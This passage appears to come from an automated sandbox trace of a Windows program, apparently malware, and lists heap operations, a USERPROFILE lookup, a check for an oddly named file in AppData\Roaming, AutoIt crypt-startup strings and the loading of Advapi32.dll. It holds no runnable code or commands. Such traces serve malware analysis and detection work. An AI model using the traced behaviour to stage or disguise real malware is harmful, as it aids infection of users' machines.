(HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0230.697] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0230.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0230.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0230.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0230.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0230.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0230.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0230.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0) returned 0x2e564e0 [0230.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0230.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0230.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0230.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0230.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0230.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0230.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0230.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c88 [0230.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0230.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0230.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0230.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0230.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b98 [0230.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0230.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0230.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0230.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50470 [0230.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0230.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0230.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0230.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0230.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0230.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0230.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0230.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa30 [0230.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0230.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0230.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0230.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0230.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0230.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0230.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa58 [0230.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0230.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0230.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0230.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa08 [0230.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0230.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0230.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f8f0 [0230.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0230.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0230.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0230.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0230.699] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0230.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0230.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0230.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0230.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0230.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa80 [0230.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0230.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0230.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0230.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0230.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0230.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f918 [0230.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0230.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0230.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0230.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0230.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fad0 [0230.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0230.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0230.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0230.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f990 [0230.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0230.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0230.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f918 | out: hHeap=0x970000) returned 1 [0230.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0230.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0230.700] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0230.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0230.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0230.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0230.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0230.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f850 [0230.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0230.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0230.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0230.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0230.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0230.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0230.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0230.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0230.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0230.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0230.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0230.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0230.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0230.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f968 [0230.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0230.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0230.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0230.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0230.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0230.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0230.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0230.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0230.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0230.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0230.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0230.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0230.702] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0230.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0230.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0230.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f9b8 [0230.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0230.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0230.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0230.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7faf8 [0230.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0230.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0230.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0230.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f9e0 [0230.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0230.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0230.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f9b8 | out: hHeap=0x970000) returned 1 [0230.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0230.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0230.702] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0230.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0230.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0230.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f9b8 [0230.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0230.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0230.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0230.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f878 [0230.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0230.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0230.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0230.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7faa8 [0230.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0230.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0230.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0230.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0230.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0230.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0230.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0230.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0230.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0230.703] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/FDKSrtwPMRhz2PyeAx.gif", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4482d20, ftCreationTime.dwHighDateTime=0x1d5ed38, ftLastAccessTime.dwLowDateTime=0xc3394820, ftLastAccessTime.dwHighDateTime=0x1d5e6c3, ftLastWriteTime.dwLowDateTime=0xc3394820, ftLastWriteTime.dwHighDateTime=0x1d5e6c3, nFileSizeHigh=0x0, nFileSizeLow=0x3baa, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="FDKSrtwPMRhz2PyeAx.gif", cAlternateFileName="FDKSRT~1.GIF")) returned 0xa875d0 [0230.794] FindClose (in: hFindFile=0xa875d0 | out: hFindFile=0xa875d0) returned 1 [0230.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0230.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0230.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0230.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0230.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0230.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0230.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0230.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f9b8 | out: hHeap=0x970000) returned 1 [0230.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0230.795] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0230.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0230.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0230.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0230.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0230.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f8a0 [0230.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0230.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0230.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0230.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0230.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0230.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0230.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0230.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0230.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0230.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0230.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0230.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0230.796] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f940 [0230.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0230.796] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0230.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f940 | out: hHeap=0x970000) returned 1 [0230.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0230.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ea8 [0230.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0230.796] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0230.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04268 [0230.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0230.796] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0230.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04268 | out: hHeap=0x970000) returned 1 [0230.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0230.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ef0 [0230.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0230.797] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0230.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0230.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0230.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0230.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0230.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0230.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0230.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0230.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0230.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0230.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0230.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0230.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0230.797] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0230.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0230.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0230.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f8c8 [0230.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0230.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0230.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0230.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f918 [0230.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0230.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0230.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0230.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f940 [0230.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0230.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0230.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0230.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0230.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0230.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0230.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0230.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0230.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0230.798] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0230.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0230.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0230.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0230.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0230.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0230.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0230.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0230.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f8c8 | out: hHeap=0x970000) returned 1 [0230.799] 